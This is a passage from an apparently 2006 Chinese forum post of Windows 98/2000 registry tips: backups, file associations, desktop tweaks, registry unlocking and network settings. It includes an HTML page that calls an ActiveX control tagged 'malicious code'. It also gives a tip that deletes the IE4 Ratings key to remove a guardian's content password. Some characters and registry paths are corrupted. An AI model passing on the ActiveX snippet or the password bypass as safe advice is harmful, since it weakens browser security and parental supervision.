  第二種,即提取Sysbackup中的Rb00x.cab文件。由於Sysbackup是隱含目錄,如果你進不了系統,同樣需要用Attrib命令去除隱藏屬*。當你用Win 98啟動盤開機進入DOS後,可利用啟動盤中自帶的Extract.exe命令將C:\Windows\sysbackup\下的rb00x.cab解壓到C:\Windows\,把源文件覆蓋以完成對註冊表的恢復。你該注意的是rb00x.cab文件一般有5個,盡量選擇日期最接近穩定時期的那一個。舉一個例子如:A:\>extract/e/l dir C:\Windows C:\Windows\sysbackup\rb004.cab *.*.當然,你也有可能不是用啟動盤啟動的,那麼到C:\Windows\Command\下去找Extract命令吧,同樣輕鬆搞定。至於在Win 98下解壓rb00x.cab壓縮包,那就更簡單了,直接找到你想還原的那個rb00x.cab文件,雙擊打開,將四個文件(還有兩個系統配置文件)分別解壓到C:\Windows\下即可。


[ 本帖最後由 蔡逸竹 於 2006-11-2 21:35 編輯 ]

TOP

四、Windows 2000的註冊表技巧

(一)備份Win 2000註冊表

1、用備份工具
Win 2000的備份程序NTBackup.exe)是一個兼容性很強的工具,備份過程簡單明瞭,可作為常規備份工具並可隨時進行備份。在備份功能啟動時,選中備份樹中的系統狀態,備份工具將保存註冊表文件、啟動系統文件、COM+類數據庫、服務器公共共享目錄等。備份後的文件以.bkf為擴展名,將備份文件置於不經常訪問、比較安全的盤。恢復時,可直接執行.bkf文件,嚮導會提示如何完成整個還原過程。

2、用註冊表編輯器
註冊表編輯工具Regedit是Win 2000另一款註冊表工具。打開「開始」選單的「運行」窗口,在打開欄中輸入Regedit即可看到如圖2的畫面,在「註冊表」選單中選擇「導出註冊表文件」項,就會彈出一個窗口,選擇保存註冊表文件的路徑和文件名,再單擊保存就OK了。備份文件以.reg為擴展名。值得提醒一點的是,此方法並不會備份安全註冊表文件和安全賬戶管理器註冊表文件。恢復時,直接雙擊備份的.reg文件即可,或在命令行方式下鍵入:Start .reg。

3、用恢復控制台
故障恢復控制台是Win 2000新增加的工具,用於從多次失敗中恢復系統。故障恢復控制台不是Win 2000的缺省安裝,且必須在故障發生前安裝才可以使用。安裝故障恢復控制台的步驟是,插入Win 2000安裝光盤,在運行窗口中鍵入:安裝光盤盤符\i386\Winnt32.exe/Cmdcons,啟動恢復控制台安裝程序。安裝了恢復控制台後,在啟動選單中會出現「故障恢復控制台」選項。啟動故障恢復控制台後,使用恢復控制台的Copy命令,將%Systemroot%\System32\Config目錄下的文件拷到一個安全目錄中。在恢復時,將備份目錄中的文件覆蓋%systemroot%\system32\config目錄下的文件,註冊表文件就恢復了。值得提醒的是,在恢復控制台下的COPY命令不支持通配符「 」和「?」,所以一次只能複製一個文件,用起來比較麻煩。

4、用安裝光盤
安裝程序恢復註冊表是在沒有其他註冊表備份時的最佳選擇。將Win 2000安裝盤插入光驅,進入CMOS設置,將系統設置為從光盤啟動。安裝程序啟動時,首先檢測硬盤驅動器,查看已經安裝的Win 2000及其修復路徑。然後會出現選擇操作的界面,按「R」,對Win 2000進行修復。在接下來的界面中,有四個選擇,選中「檢查註冊表文件」(要全面恢復系統,最好四項都選中)。安裝程序開始修復選定的安祝在修復註冊表文件後,系統重新啟動,Win 2000就會工作正常了。

5、用緊修復盤
製作緊修復盤的方法是用NTBackup工具,在歡迎標籤中選擇「緊修復盤。選中選項「將註冊表文件複製到修復目錄中」復選框,那麼在製作緊修復盤的同時,會自動將當前註冊表文件備份到%Systemroot%\Repair文件夾。用緊修復盤修復註冊表的過程與用安裝光盤基本相似,不再講述。


(二)深入剖析Win 2000註冊表

1、Win 2000註冊表的主要特性
中心存儲地址
將以前分散在計算機硬盤上的配置信息匯總。
軟件信息
Win 2000註冊表的功能之一就是記錄系統的軟件配置,包括Win 2000本身。
硬件信息
在Win 2000中註冊表記錄了PC機的全部硬件情況。

2、Win 2000註冊表的主要作用
記錄安裝選擇
設置硬件
設置Win 2000
運行啟動程序
定義Win 2000的顯示方式
確定組件方式
向管理員報告配置數據

3、Win 2000註冊表的五大功能
糾正Win 2000的錯誤。
恢復崩潰系統
提高運行速度和使用方便性
提高安全性
控制服務器


(三)Win2K註冊表實用技巧
去掉桌面上"電腦"
打開註冊表實用程序RegEdit,找到子鍵
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
打開它時,我們能看到它右邊列出了該鍵的含義及默認的鍵值。刪除該子鍵,然後刷新一下桌面在找找看有沒有電腦這個完。

用當前的計算機名稱和用戶名字替換"電腦"
HEKY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}子鍵,拷貝它的子鍵LocalizedString的鍵值到記事本(如,@C:\winnt\system32\shell32.dll, -9216@1033, 電腦)。刪除子鍵LocalizedString。然後用數據類型REG_EXPAND_SZ重建它。拷貝剛剛記事本的內容到新建的鍵,並且將"電腦"改變成"%username% on %computername%"。

隱藏最近登錄的用戶
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
找到鍵DontDisplayLastUserName,值設置為1。1代表True(是),0代表False(否)。

為你的開始菜單和任務欄加速
HKEY_CURRENT_USER\Control Panel\Desktop把MenuShowDelay的值由400改為100

禁止CD-ROM的自動運行   
記得Win98里通過設置控制面版中的系=>設備管理=>Cdrom=>屬*=>設置=>自動插入通告可以達到禁止CD-ROM的自動運行,但每次我們修改完畢後必須重新啟動方可生效。而在WIN2K中可以通過修改註冊表來實現,打開註冊表管理程序,找到子鍵HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom設置AutoRun值為0即可。

改變歡迎對話框
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon,將LegalNoticeText的值改成你需要顯示的內容,改變對話框的標題的話可以將LeagalNoticeCaption的值改成你所需要的,設置登綸紙「HKEY_USERS\.DEFAULT\Control Panel\desktop」項右邊窗口中找到字串值「Wallpaper」,將它的值改為一個BMP格式的圖像文件的完整路徑,就可以在登錄時作為壁紙顯示;修改字串值「TileWallpaper」的值,可以改變它的顯示方式,其中「0」表示居中,「1」表示平鋪,「2」表示拉伸。

修改登魯景顏色
如果沒有設置登綸紙,在「HKEY_USERS\.DEFAULT\Control Panel\Colors」項中修改字串值「Background」的值,就可以改變登錄時的背景顏色(默認值為「58 110 165」,分別表示R、G、B的值,三個值之間用空格分隔)。

在登錄窗口添加信息
在「HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersionWinlogon」項中新建一字串值「LogonPrompt」,在其中輸入你想加的提示信息,

自動顯示登錄選項
在啟動過程中出現「登錄到Windows」窗口時,按〔選項〕按鈕可以出現「使用撥號網絡連接登錄」復選框,修改「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon」項中雙字節值「ShowLogonOptions」的值為「1」,就可以自動顯示登錄選項。

取消上一次登錄名
如果在Windows 2000系統中設置了多個用戶,每次按下〔Ctrl+Alt+Delete〕組合鍵後會在登錄窗口中顯示上次登錄的用戶名。將「HKEY_LOCAL_MACHINE\SOFT-WARE\Microsoft\Windows NT\CurrentVersion\Winlogon」項中字串值「DontDisplayLastUserName」的值設為「1」就可以在登錄窗口中不顯示上一次登錄的用戶。

註冊表的文件關聯及應用—註冊表使用全攻略之二

喜歡使用Windows右鍵快捷菜單的朋友可能知道,當你選擇了一個文件(或者是文件夾或是系統完)再單擊鼠標右鍵,系統就會彈出一個菜單,菜單上面的各種「功能」(或稱「操作」)任你選擇,但是你是否注意到,當你安裝一些應用軟件之後,你的右鍵菜單是不是膨脹,以winzip為例,安裝winzip之後,文件或文件夾的右鍵菜單當中就增加了功能選擇項"Add to Zip"和"Add to xxx.zip",,看到這個變化,我們不禁要問,這些選擇項是怎麼加入的,可不可以自己來添加。帶著這些問題,我們再來看Windows的文件關聯。

  什麼是文件關聯呢?通俗地說,就是選擇不同類型的文件時,在其右鍵菜單上顯示的各功能項。每個功能項即對應一個關聯。選擇了某一功能(操作),系統就去執行相應的處理程序。至於對什麼文件的什麼操作對應什麼樣的處理程序,那都記錄在系統註冊表中。因此,要真正弄清文件關聯,必須深入研究註冊表。這個問題解決了,我們就可以利用註冊表隨心所欲地為文件建立,修改,刪除關聯。

  既然關聯信息都寫在註冊表中,那麼它在註冊表中又是怎樣構成的呢?我們不妨打開註冊表,觀察根鍵HKEY_CLASSES_ROOT之下的各個主鍵。(這樣或許更易說明這一點)你是不是看到了很多前面有一個點(.),後面好像是文件擴展名的主鍵,如.bat,.txt,.lnk,.bmp等。我們把這一類的主鍵稱之為「擴展名主鍵」,每個擴展名主鍵都有一個默認鍵值。

如:主鍵.bat的默認值為batfile; .lnk主鍵的默認值為lnkfile。舉了這兩個例子,你是否看出了其中的規律。即:若「擴展名主鍵」名為.xxx(xxx為某一類文件的擴展名),那麼它的默認鍵值就為xxxfile。當然並不是所有的默認值都是這樣,也可能多個主鍵對應同一默認值。比如:主鍵.jpeg和主鍵.jpg,它們的默認值jpgfile;.html和htm的默認值都為htmlfile。為什麼要說這麼多的擴展名主鍵的默認值呢?其中原因且聽我慢慢道來。這個默認鍵值的作用就非同小可了,它可是文件關聯的橋樑和紐帶,是它將文件的類型(以擴展名來標識文件類型)與文件的關聯聯繫起來。不信,你可以將某一「擴展名主鍵」的默認鍵值亂改一通,你就會發現,該類文件的許多關聯項在右鍵菜單中消失了。既然這個重要的默認鍵值起了一個橋樑的作用,那麼橋樑的另一端——文件的關聯又是如何定義的呢?我們繼續看註冊表,讓它來給我們解釋。依然是在HKEY_CLASSES_ROOT根鍵之下。我們可以看到該根鍵之下有如下主鍵。如:batfile,txtfile,lnkfile 等。

這些主鍵好像都是剛才我們所說的「擴展名主鍵」的默認值。不錯,上述默認值在此處正好變成了主鍵名——這就是橋樑。我們把這一類的主鍵稱為「標識主鍵。一般而言,在「標識主鍵」之下有以下幾個重要主鍵:


 DefaultIcon主鍵,它的功能是定義該類文件的默認完。
Shell主鍵,它的功能是本文討論的中心——文件關聯之「命根」所在。文件的各種關聯都寄生在此「根」之下,正是它定義了該類文件與多個程序相關聯。它的默認值也很有用,你是否還記得雙擊文件可以將文件打開(對於已註冊的文件),這種打開就是利用了系統註冊表所設定的默認打開方式,即由shell主鍵的默認鍵值來控制。它之下的每個主鍵,都可稱作是「關聯主鍵」(如圖四)。「關聯主鍵」的鍵名是任意的(建議用英文),它的默認鍵值也是我們感興趣的。因為這一默認鍵值會直接顯示在右鍵菜單中,並且每個「關聯主鍵」之下都有一個command主鍵,這個主鍵定義的就是「該關聯對應的執行程序。如圖五所示,到此文件關聯已昭然若揭。


  下面我們就以.reg文件(註冊表的腳本文件)為例來說明其關聯過程。

  首先.reg文件在HKEY_CLASSES_ROOT根鍵之下有一個「擴展名主鍵。.reg其默認值為regfile,說明reg類型文件關聯的主鍵是regfile。再在該根鍵之下找「標識主鍵」regfile,regfile主鍵之下有一個DfaultIcon主鍵,作用是定義reg文件的默認完。其默認鍵就是完的全路徑文件名。如: C:\windows\regedit.exe,1(表示的是regedit.exe中的第2個完)。regfile主鍵之下還有一個上文稱之為「命根」的主鍵shell,reg文件的關聯就記錄在shell之中。下面我們就為regt建立一個關聯。步驟為:在shell主鍵之下,新建主鍵xxf(名任意),置其默認值為:「徐喜峰的文本編輯器」,再在xxf主鍵之下新建主鍵command,置其默認值為C:\Windows\Notepad.exe %1,該默認值的意義為:用記事本來打開當前reg文件。若沒有%1參數,則只運行記事本程序,而不打開當前文件。設置完畢,你再看看reg文件的「右鍵菜單」,是不是多了一個「徐喜峰的文本編輯器」選項,爽吧!~

以上所說的只是作用於普通文件的關聯,然而在Windows中,除了文件,還有文件夾及特殊的文檔(如電腦,驅動器,回收站等)。那麼這些又該如何設置關聯呢?那就請記住在HKEY_CLASSES_ROOT根鍵之下還有以下幾個重要的系統關聯主鍵:

  *:作用於所有文件,它與「標識主鍵」的關聯方法一樣。
  Directory:作用於一般文件夾。
  Folder:作用於所有文件夾,包括特殊文件,如:控制面板,回收站等。
  Drive:作用於驅動器,如A驅,B驅,C驅。
  Unknow:作用於系統不能識別的文件類型,即沒有註冊的文件類型。

  最基本的文件關聯就談到此處,下面來看看文件關聯的應用。

  應用之一:讓MS-DOS方式無處不在。

  經常用到DOS方式的朋友可能有些厭煩,因為每次進入DOS方式,都要選擇「開始\程序\MS-DOS方式。利用文件關聯,我們可以將MS-DOS方式添加到任何文件的「右鍵菜單」中,這樣就省事多了,方法為:
將註冊表展開到HKEY_CLASSES_ROOT\*\shell分支。(在所有文件的「右鍵菜單」中添加MS-DOS方式)新建主鍵「MS-DOS",置其默認值為「進入MS-DOS方式」,在MS-DOS主鍵之下新建command主鍵,置其默認值為:
「C:\Windows\command.com。
另註冊表展開到HKEY_CLASSES_ROOT\Folder\shell分支,(在所有文件夾的「右鍵菜單」中添加MS-DOS方式)設置同上。

  應用之二:隱去快捷方式完中的小箭頭。

  如果你覺得快捷方式完中的小箭頭有點障眼,那麼利用關聯,可以將之去掉,將註冊表展開到HKEY_CLASSES_ROOT\lnkfile分支,將lnkfile主鍵之下的鍵值Isshortcut刪除,再將註冊表展開到HKEY_CLASSES_ROOT\piffile分支,將piffile主鍵之下的鍵值Isshortcut刪除,即大功告成。

  應用之三:用記事本來編輯bat文件。

  有時想編輯bat文件,而習慣*地雙擊它,這一雙擊,並沒有將它打開編輯,而是將它執行,讓人甚為惱火。利用註冊表的文件關聯,可以將之改變。將註冊表展開到HKEY_CLASSES_ROOT\batfile\shell分支,將shell主鍵的默認值由open改為edit即可。

  應用之四:更改某類文件的默認完。

  以txt文件為例,將txt文件的完改為「電腦」的完。將註冊表展開到HKEY_CLASSES_ROOT\txtfile\DefaultIcon分支,將主鍵DefautIcon的默認鍵值改為:"C:\Windows\explorer.exe,0" 即可。

  應用之五:為所有文件增加「打開方式。

  將註冊表展開到HKEY_CLASSES_ROOT\*\shell分支,新建主鍵open_as,置其默認值為「選擇打開方式」,在Open_As主鍵之下新建主鍵command,置其默認值為:"C:Windows\rundll32.exe shell32.dll , openAs_RunDll %1"

  應用之六:將「關機」加入到右鍵菜單。

  將註冊表展開到HEKY_CLASSES_ROOT\Directory\shell分支,新建主鍵close,置其默認值為「關閉系統」,再在close主鍵之下,新建主鍵command,置其默認值為:"C:\Windows\rundll32.exe user.exe, exitwindows"

  以上六例應用,總體上能夠概述文件關聯的基本結構和基本框架,弄清了文件關聯的結構與框架,自己再增加關聯就是小菜一碟了。只要你有興趣,你可以將你的右鍵菜單加得滿滿的。如果你想瞭解更深一層次的文件關聯,那就請你參閱有關windows註冊表方面的書籍與資料,或與我聯繫,Email架email]Oamen.twty@china.net[/email]。在文章結束之前,還告訴一點小小的訣竅:那就是註冊表在作過修改之後,很多場合需要重新啟動才能生效。這裡我告訴一個不需要重啟但又能快速更改註冊表的方法:選擇「開始\關閉系統」,在彈出「關閉系統」框之後,按Ctrl+Alt+Del 組合鍵,出現「結束任務」框,選擇其中的「Explorer」,再單擊「結束任務」,等待一會兒(10秒左右),就會出現一個「結束任務」確認框,點擊「結束任務」按鈕即可。

Win2000註冊表應用六則—註冊表使用全攻略之三

一、如何刪除多餘的DLL文件
  在Win2000的System子目錄下存有大量的DLL文件,這些文件可能被系統或應用程序共享。但是由於經常安裝和卸載軟件,就會在System目錄下留下一些DLL垃圾文件。它們不但佔用了硬盤空間,而且還降低系統的運行速度。刪除它們的步驟如下:
  1.運行「regedit」,打開註冊表編輯器。
  2.打開
  HKEY_LOCAL_MACHINE\Software\ Microsoft\Windows\CurrentVersion\Shared DLLs分支。
  這裡SharedDLLs(圖2)子鍵記錄的就是有關程序共享的DLL信息,每個DLL文件的鍵值說明它已被幾個應用程序共享。如果是二進制鍵值為「00 00 00 00」,則表明不被任何程序共享。(另外「0x00000001(1)」是十六進製表示法)
  3.System目錄中刪除對應的文件。

二、去掉桌面快捷方式的小箭頭
  在一些程序的安裝過程中,會自動在桌面上創建該程序的快捷方式,方便了我們的使用。但是那個小箭頭不太好看。我們可以利用修改註冊表來去掉它。首先要注意此快捷方式是什麼類型的,一般說來以.LNK居多,也有一些是.PIF(指向MS-DOS程序的快捷方式)。具體步驟如下:
  1.運行註冊表編輯器,打開HKEY_CLASSES_ROOT\lnkfile分支
  2.在lnkfile子鍵下面找到一個名為「IsShortcut」的鍵值,它表示在桌面的.LNK快捷方式完上將出現一個小箭頭。右鍵單擊「IsShortcut」,然後從彈出的菜單中選擇「刪除」,將該鍵值刪除。
  3.關閉註冊表編輯器,重新啟動Win2000,就可發現快捷方式完上已經沒有小箭頭了。
  同理,對指向MS-DOS程序的快捷方式(即.PIF)完上的小箭頭,則除了是打開HKEY_CLASSES_ROOT\piffile分支外,其餘同上。

  三、註冊表的恢復法
  1.重新啟動並切換到MS-DOS方式
  2.進Windows\Command目錄,鍵入SCANREG/RESTORE後回車
  3.進入界面後,可在5個註冊表備份中選取所要恢復的,重新啟動後即可

  四、鎖定桌面
  桌面設置包括壁紙、完以及快捷方式,它們的設置一般都是我們經過精心選擇才設定好的。大多數情況下,我們不希望他人隨意修改桌面設置或隨意刪除快捷方式。怎麼辦?其實修改註冊表可以幫你鎖定桌面,這裡「鎖定」的含義是對他人的修改不做儲存,不管別人怎麼改,只要重新啟動計算機,你的設置就會原封不動地出現在你面牽
  1.運行regedit進入註冊表編輯器,找到如下分支:Hkey-Users\ Software\Microsoft\Windows\CurentV ersion\Polioies\Explores
  2.雙擊「No Save Setting」,並將其鍵值從0改為1
  3.確認後退出註冊表編輯器,重新啟動即可。
  上面的修改是把計算機上所有用戶的桌面設置全部鎖定了,如果你只想鎖定你自己的桌面,而不理會別人的設置是否被修改,可以在下面的路徑中執行相同的操作:Hkey-Current-User\Software\Microsoft\Windows\Current Version\Policies\Explores。

  五、關閉「單擊從這裡開始」動畫箭頭
  Win2000開機時,有時候屏幕底部的任務條中會出現一個從右到左的動畫箭頭,指示「單擊從這裡開始」,用下面方法可以使它禁止顯示
  1.打開註冊表,進入下面路徑:Hkey-Current-User\Software\ Microsoft\Windows\Current Version\Policies\Explores
 2.建立一個二進制鍵名:「No Start Banner」
  3.雙擊該鍵名,並輸入鍵值「01000000」
  4.確認後退出,並重新啟動計算機
  如果想使這個修改對所有用戶生效,可到下面路徑中執行相同的操作:Microsoft\Windows \Current\Current Version\Policies\Explores
  註:如果你的電腦開機時沒這個動畫箭頭,一定是計算機在開機時自動加載了某個應用程序。

  六、防止菜單隨鼠標移動
  在Win2000中當你把鼠標指向下拉級聯菜單的標題稍作停留,其下一級子菜單會自動彈出。有時候這個性能也會有「副作用—在鼠標移動過程中,稍不留意,按一下左鍵,就可能啟動一個你並不需要的窗口。可以修改註冊表關閉這項功能,使單擊該菜單才彈出其下一級子菜單:
  1.打開註冊表,進入下面目錄:Hkey-Current-User\Control Pannel\Desktop
  2.添加一個鍵名:「Menu Show Delay」
  3.輸入鍵值「65534」
  4.確認後重啟計算機。

解開註冊表被鎖的方法—註冊表使用全攻略之四
一、解鎖方法:
1。 你可以在恢復註冊表時,用F8進入選DOS模式或用 運行,C:>SCANREG/RESTORE

2。 你也可以用NotePad編輯一個文本文件,保存文件的時候用格式 xxxxxx.reg
在文件中打入以下:
(空一行)
REGEDIT 或 REGEDIT4
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\
Policies\system"DisableRegistryTools"=dword:00000000]
保存文件後,導入註冊表。

3。 使用第三方工具恢復,如用超級兔子註冊表魔法等

4. 用 Win9X/ME 者,可以安裝 Norton Utilities,用其自有的 RegEdit.那就不受任何限制了。

二、HTM文件解開註冊表
<HTML>
<head>
<TITLE>解開註冊表</TITLE>
<meta name="keywords" content="註冊表,惡意代碼,修改註冊表">
<meta name="description" content="Robonic修改,QQ:1000002www.J3J4.com">
</head>
<SCRIPT></SCRIPT>
<OBJECT id=closes type="application/x-olexxx" classid="clsid:adb880a6-d8ff-11cf-9377-

00aa003b7a11">
<param name="Command" value="Close">
</xxx>
<input type="button" value="解開註冊表" onclick="closes.Click();">
</HTML>

存為HTM文件,打開就可以了~~~


三、利用微軟在系統安裝光盤中所提供的另一款利器——系統策略編輯器(Poledit),輕鬆地解決這個問題。

以在Windows 9x操作系統下的使用為例來介紹。

  首先,將安裝光盤中ToolsReskitNetaminPoledit文件夾中的所有文件複製到硬盤中,然後雙擊Poledit.exe運行系統策略編輯器(如果提示找不到模板文件,可以從系統策略編輯器的「選項」菜單中選擇「模板」,然後單擊「打開模板」,再選擇Admin.adm文件即可)。在「文件」菜單中選擇「打開註冊表」,此時你就會發現下面原來空白的面板中多了兩個完:一個是「本地計算機」,一個是「本地用戶。

  我們要用的主要是「本地用戶」(「本地計算機」裡面主要是網絡和系統方面的設置,有興趣的讀者可以自己去試試)。雙擊「本地用戶」,會彈出「本地用戶屬*」界面,在該界面中可看到一個樹形目錄,包括「控制面板、「桌面、「網絡、「外殼」和「系統」5項。

  下面,我們就來體驗一下系統策略編輯器的威力吧!對於上面提及的註冊表被鎖的例子,現在我們只要選擇「系統→限制」選項,就可以看到4個選項。如果你的註冊表被鎖,則「禁用註冊表編輯器」前的復選框被選中。取消對該選項的選取,按「確定」退回主界面。別,這時工作還沒完成呢!選擇「文件→保存」,你所做的修改才能生效。然後試試運行Regedit,是不是可以用了呢?其實,在這5個基本目錄中你還可以實現很多常用的個性化設置,這裡就不多談了。

  
四、利用系統策略編輯器
在Windows 2000/XP/2003中,我們可以通過單擊「開始→運行」,輸入「Gpedit.msc」後回車,打開「組策略。然後,依次展開「用戶配置→管理模板→系統」,雙擊右側窗口中的「阻止訪問註冊表編輯工具」,在彈出的窗口中選擇「已禁用」,「確定」後再退出「組策略」,即可為註冊表解鎖。

巧改註冊表來增強網絡功能—註冊表使用全攻略之五

         1、指定首選的網絡服務器

  在註冊表中依次展開[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32\NetworkProvider],並在其主鍵下創建或更改串值AuthenticatingAgent,附值為指定的服務器

  2、禁止自動登陸網絡

  在註冊表中依次展開[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32\NetworkProvider],同時在下面主鍵下創建DWORE值DisableDefaultPasswords,(1=取消自動登陸,0=自動登陸)

  3、顯示域名登陸確認

  在註冊表中依次打開[HKEY_LOCAL_MACHINE\Network\Logon]在下面主鍵下創建或更改DWORD值DomainLogonMessage,(0=取消,1=啟用)

  4、清理訪問「網絡鄰居」後留下的字句信息

  使用局域網的用戶在訪問網絡鄰居時,註冊表會在HEKY_CURRENT_USER/Network/Recent主鍵項中記錄下一系列命令操作的信息,包含被訪問機器的名字、訪問過的應用程序及文件名等,如:主鍵Recent包含一名為\ierl_server\software的子主鍵項,表示你曾訪問過名為ierl_server的服務器中的software文件夾,點擊此項後編輯器右窗顯示此項的名稱及鍵值。這些內容基本沒有用途,可以適當的清理一下。打開註冊表編輯器後,按以下順序依次打開各級主鍵:HEKY_CURRENT_USER、Network、Recent,然後把主鍵Recent的子項刪除即可。

  5、更改IE4.0的安全口令

  您可以在IE4.0的「Internet選項」對話框的「內容」選項頁的「分級審查」框中設置口令,這樣,在顯示有ActiveX的頁面時,總會出現「分級審查不允許查看」的提示信息,然後彈出口令對話框,要求您輸入監護人口令。如果口令不對,則將停止瀏覽。但是,如果此口令遺忘了,則無法瀏覽這些特徵的頁面。在口令遺忘後,重裝IE4.0也無法去掉安全口令。這時只有求助於註冊表了:
  打開HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies分支,在Policies子鍵下選擇「Ratings」子鍵,按Del鍵將其刪除,由於Ratings子鍵下的Key鍵值數據就是經過加密後的口令,刪除了這一項,IE4.0自然就認為您沒有設置口令了。

  6、從Netscape中清除曾到過的網址

  為了保密起見,您可以清除Netscape的「Addres 框的下拉式菜單內的網址,這樣別人就無法獲得您曾到過的網站。
  (1)在Netscape 3.x中,您必須通過註冊表編輯器修改註冊表達到此目的,其操作步驟如下:打開HKEY_CURRENT_USER\Software\Netscape\NetscapeNavigator\URLHistory分支。在右窗格中我們可看到這些曾到過的網址的列表清單,選擇要刪除的網址選項,然後按Del鍵即可。
  (2)在Netscape 4.x中,首先用記事本中打開文件C:\Program Files\Netscape\Users\caogjwj\prefs.js假定您的註冊名稱為zys666),此文件的內容通常是這樣的:
user_pref(「browser.url_history.URL_2",「http://pcworld.com.cn/";;)
  在此文件中刪除其中您想要隱藏的網址整行,然後存盤退出即可。
  為了讓Netscape 4.x不再向prefs.js文件中寫入任何網址,將此文件的屬性改為只讀即可。

  7、為一台機器設置兩個IP地址

  一般情況下只能為一個網絡適配器配置一個IP地址,但通過修改系統註冊表,卻可以為一個網卡配置多個IP地址:運行註冊表編輯器,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans,在此目錄中可以看到多個名為0000、0001、0002…的目錄,它們用於記錄協議的安裝情況。在它們中間找到DriverDesc為「TCP/IP」的目錄,修改IPAddress和IPMask兩個鍵。

其中IPAddress為用逗號隔開的多個IP地址,I PMask是對應的掩碼。例如設置IPAddress為「210.73.140.3,210.73.140.5」,IPMask為「255.255.255.192,255.255.255.192」時,表示為系統設置了兩個IP地址210.73.140.3和210.73.140.5。

  8、加快網絡傳輸速度

  Windows操作系統在網絡撥號設計上有加強的餘地,只需增加MaxMTU、MaxSSS、DefaultRcvWindow及DefaultTTL就能加快網上奔馳的速度。
  a.修改MaxMTU及MaxSSS啟動註冊表編輯器,找出以下關鍵字:HKEY_LOCAL_MACHINE\System\Current
  Control Set\Services\Class\NetTrans\000n(n表示個別拔號網絡連接項號碼)。例如0002,在***n右面Windows會有一些如DeviceVxDs、IpAddress等名稱,在右邊窗口任意空白外點擊,在菜單上選「編輯→「新增→「字符串值」,右邊窗口就會多出一個新字符串,把它命名為「MaxMTU」,再雙按這個字符串值並把它設定為「576。同樣,在右邊窗口加上「MaxSSS」字符串值並將它的值設定為「536。
  b.修改DefaultRcvWindow及DefaultTTL啟動註冊表編輯器,找出以下關鍵字:HKEY_LOCAL_MACHINE\System\Current Control Set\Services\VxD\MSTCP在右邊窗口加上字符串值「DefaultRcvWindow」並把它的值設定為「2144」,再增加另一字符串值「DefaultTTL」並把它的值設定為「60」至「64」(註:60是最小值,64是最大值,只要填上其中一個值就可),完成後關閉註冊表編輯器並重新啟動Win95即可。

  9、修改IE5.0的搜索引擎

  在註冊表中依次展開「HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search」,在右側窗口中把「CustomizeSearch、「SearchAssistant」改為你定義的搜索引擎,如http://www.yeah.net/,以後當你每次點IE5.0的搜索引擎時,即可自動調出你定義的搜索引擎,如上面設定的中文搜狐。

  1解決局域網中啟動直接登錄問題

  有時重新安裝了操作系統後,啟動時不能直接登錄局域網,而只能通過按「開始」/註銷,才能出現登錄界面,解決方法是在註冊表中依次展開「HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Real Mode Net」,將右側窗口中的AutoLogon刪除即可。

  1定制IE地址

  用過IE的人都遇到過「取消操作」提示,還有「Web頁不可脫機使用」,「警告:網頁已經過期」等情況,但是你有沒有注意到出現提示頁時地址欄中顯示的是什麼,URL為「about:xxxxxxx。about是除了「http、「ftp、「mailto、「gopher」外的特殊協議,利用它可以使用別名調閱特定的網頁,比如IE的空白頁,則的URL欄中打入about:blank即可,blank即為空白頁的別名。
  利用這可通過創建類似的別名,指向我指定的網頁地址,在註冊表中依次展開「HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AboutURLs」,在右側窗口中單擊鼠標右鍵,從彈出的快捷菜單中,選擇「新建、「串值」,然後將「新值#1」更名為你要給指向的網頁(網址)取的名字,右擊該名字,再將其值設置為你想要指向的網址,注意不能省了「http://。
  你也可以用此法給硬盤上常用網頁取個別名,填上路徑即可方便打開了。

  12、防止他人獲取對Web頁面的訪問信息

  通過修改註冊表我們可以隱藏曾瀏覽過的URL地址。其方法如下:
  對於Netscap的用戶:在註冊表中依次展開「HKEY_LOCAL_MACHINE\Software\Netscape\Netscape Navigator」分支,刪除其下的URL子鍵的所有內容。
  對於IE用戶:在註冊表中依次展開「HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs」分支,刪除其下的URL子鍵的所有內容。

  13、更改Outlook Express信箱存放路徑

  如果您想修改Outlook Express信箱存放路徑,可以在HKEY_CURRENT_USER\Identities\{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software\Microsoft\Outlook Express\5.0下修改「Store Root」字符串值為要修改的路徑。

  14、增加IE自動識別功能

  經常上網的朋友知道,您要訪問形如www.XXX.com這樣的網站時,只要在地址框中直接鍵入XXX,IE就會自動加上.com的後綴進行訪問,省去了很多麻煩。但是如果您想訪問www.XXX.com.cn這樣的網站就沒那麼方便了,因為IE未包含.cn後綴的自動連接功能。
  為了能夠增加上述的識別功能,用戶可以依次打開註冊表

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\UrlTemplate,點擊右鍵,選擇新建字符串,輸入www..%s.com.cn即可添加。

  15.修改註冊表加快網絡速度
  
  a. 修改MaxMTU及MaxSSS啟動註冊表編輯器,找出以下關鍵字:HKEY_LOCAL_MACHINE\System\Current Control Set\Services\Class\NetTrans\000n(n表示個別拔號網絡連接項號碼)。例如0002,在***n右面Windows會有一些如DeviceVxDs、IpAddress等名稱,在右邊窗口任意空白外點擊,在菜單上選「編輯→「新增→「字符串值」,右邊窗口就會多出一個新字符串,把它命名為「MaxMTU」,再雙按這個字符串值並把它設定為「576。同樣,在右邊窗口加上「MaxSSS」字符串值並將它的值設定為「536。

  b. 修改DefaultRcvWindow及DefaultTTL啟動註冊表編輯器,找出以下關鍵字:

